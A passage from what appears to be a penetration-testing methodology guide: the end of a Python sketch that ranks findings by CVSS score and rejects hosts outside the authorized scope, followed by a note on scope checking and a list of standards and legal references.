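            raise ValueError(f"{f.host} is outside the authorized scope")
    return sorted(findings, key=lambda f: f.cvss, reverse=True)


if __name__ == "__main__":
    # Illustrative findings only; titles and scores are made up for the example.
    findings = [
        Finding("Verbose error page", "192.0.2.20", 5.3),
        Finding("Unauthenticated remote code execution", "192.0.2.10", 9.8),
        Finding("Outdated TLS configuration", "192.0.2.30", 3.7),
    ]
    for f in rank_findings(findings):
        print(f"{severity(f.cvss):8} {f.cvss:4.1f}  {f.host}  {f.title}")
```

Checking exclusions before inclusions is a deliberate choice in this sketch: an out-of-scope entry in the RoE should win even when it sits inside a broader in-scope range. Refusing to rank a finding on an unauthorized host is one simple way to surface scope creep before it reaches the report.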
References
Penetration Testing Execution Standard (PTES). http://www.pentest-standard.org
National Institute of Standards and Technology. Technical Guide to Information Security Testing and Assessment, NIST SP 800-115, 2008.
Institute for Security and Open Methodologies. OSSTMM: Open Source Security Testing Methodology Manual.
Harris, S., et al. Gray Hat Hacking: The Ethical Hacker’s Handbook. McGraw-Hill.
U.S. Department of Justice. Policy for Charging Cases under the Computer Fraud and Abuse Act, 2022 (and subsequent guidance).
Supreme Court of the United States. Van Buren v. United States, 593 U.S. ___ (2021).
(ISC)² Code of Ethics; EC-Council Code of Ethics.
FIRST. Common Vulnerability Scoring System (CVSS) v3.1 Specification.
Related work by the author (see Appendix E):
Hayes, N., Komi, J., Trivedi, D. (2026). Agentic Artificial Intelligence for Offensive Capture-the-Flag Challenges: Design, Ethical Boundaries, and Security Evaluation.
Trivedi, D. (2026). CTF Guide with PLC Security.